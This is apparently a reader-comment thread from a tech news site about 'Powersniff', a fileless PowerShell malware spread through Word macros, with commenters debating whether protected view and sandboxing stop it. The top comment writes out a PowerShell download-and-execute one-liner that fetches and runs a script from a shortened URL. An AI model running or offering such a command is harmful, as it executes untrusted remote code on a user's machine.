The power of PowerShell
iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
Microsoft's PowerShell has once again become an attack vector for malware, this time a file-less attack dubbed "Powersniff" by Palo Alto Networks. The attack arrives through e-mails containing Word documents bearing malicious macros, almost as if it isn't more than 15 years since the first macro viruses were let loose on the …
> ...it has to get past your email spam defenses,
> then pass the AV defenses,
> then it's in.
Nope. Delivered through a browser or email client, the Word document file will be tainted with the "internet zone". Upon seeing that, Word will by default open the document in protected view mode.
What this means is that the process running Word will be running with low integrity mode (same as protected mode in Internet Explorer, same as Google Chromes sandbox on Windows). Macros are disabled in protected view. Even if there was an exploitable memory corruption bug, the Word instance is still sandboxed.
Dear God in Heaven, do I wish that were true.
Security in SMBs is only as good as the technical know-how of the CEO. If he fancies himself a programmer, or if one of his buddies showed him a Word macro that reveals the picture of a flying pig and he found that funny, you can kiss that notion adieu.
Biting the hand that feeds IT © 1998–2022